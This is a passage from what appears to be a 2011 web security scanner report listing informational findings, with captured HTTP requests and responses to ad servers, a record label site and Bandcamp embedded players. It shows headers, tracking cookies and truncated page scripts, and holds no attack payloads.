!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44~~!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr~~!#h.N!!!!#<yMiw!#k]4~~!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w~~!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI~~!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="htt
...[SNIP]...
24.6. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
24.7. http://asthmatickitty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
24.8. http://asthmatickitty.com/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
24.9. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: client_id=1ABD9ECB0C477772232F73DDC019AC3839B64C9B

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:15 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Connection: Keep-alive
Content-Length: 9768

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...
24.10. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: client_id=1ABD9ECB0C477772232F73DDC019AC3839B64C9B

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:15 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Connection: Keep-alive
Content-Length: 8445

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...
24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
24.12. http://cdn.apture.com/media/html/aptureLoadIframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=30596971 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 00:19:35 GMT
Age: 221973
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1871
Last-Modified: Sat, 07 May 2011 00:12:44 GMT
Connection: keep-alive
Content-Length: 1871

<!--
This is the page which handles fetch/load of localStorage
-->


<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...
24.13. http://content.pulse360.com/cgi-bin/context.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
24.14. http://cookie.alvenda.com/v2_1/code/ExtractCookie.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cookie.alvenda.com
Path:   /v2_1/code/ExtractCookie.html

Request

GET /v2_1/code/ExtractCookie.html HTTP/1.1
Host: cookie.alvenda.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: FsxkbpWeK0qBOf2Doc+3kBZJPfb/6XlZ16Ch9bgIahu/WOkXnvXkghPN8Ynv9vNi
x-amz-request-id: 05B9EA00AB19A8BF
Date: Mon, 09 May 2011 14:05:56 GMT
Last-Modified: Mon, 16 Aug 2010 17:24:15 GMT
ETag: "be82aa9e91a51521e3bc2bd4cf668430"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1130
Server: AmazonS3

<html>
<head>
</head>
<body>

<script type="text/javascript">//<!--

function sendMessage(value) {
try {
parent.postMessage('message_' + value, '*');
} catch (e) {
// In IE6 an
...[SNIP]...
24.15. http://dx.nme.com/ifrm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dx.nme.com
Path:   /ifrm.html

Request

GET /ifrm.html HTTP/1.1
Host: dx.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
